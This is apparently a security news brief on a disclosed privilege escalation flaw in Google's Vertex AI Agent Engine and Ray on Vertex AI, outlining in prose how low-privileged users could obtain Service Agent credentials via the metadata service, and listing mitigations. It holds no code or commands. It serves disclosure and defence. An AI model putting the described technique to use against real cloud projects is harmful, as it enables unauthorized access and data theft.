32/69 Monday, January 19, 2026

Cybersecurity researchers have disclosed a high-severity privilege escalation vulnerability in Google’s Vertex AI platform that could allow low-privileged users to escalate their access and take control of Service Agent accounts, which are system-managed identities with elevated permissions. The vulnerability affects Vertex AI Agent Engine and Ray on Vertex AI and stems from insecure default configurations that allow users with limited permissions to improperly access managed identities with project-wide privileges.
The first issue involves Vertex AI Agent Engine, a service used to develop and deploy AI agents. Researchers found that an attacker with only permission to modify reasoning engine settings could inject malicious Python code into the workflow. When executed, the code runs within the service’s compute environment, allowing the attacker to retrieve credentials for the Reasoning Engine Service Agent via the cloud metadata service. This service account has access to sensitive resources such as conversation histories, model memory, storage locations, and execution logs, potentially leading to unauthorized access or data leakage within the organization.
The second vulnerability was identified in Ray on Vertex AI, where users with read-only permissions could still access core control components of the compute environment through tools in the GCP Console, effectively gaining elevated control. From there, attackers could extract access tokens for the Custom Code Service Agent via the metadata service. Although these tokens have certain limitations, they still provide full control over critical resources, including Cloud Storage, BigQuery, and Pub/Sub.
Researchers recommend that organizations using Vertex AI immediately restrict Service Agent permissions by implementing custom IAM roles, disabling unnecessary access to system control tools, reviewing code prior to deployment, and monitoring access to the metadata service to mitigate the risks posed by these vulnerabilities.
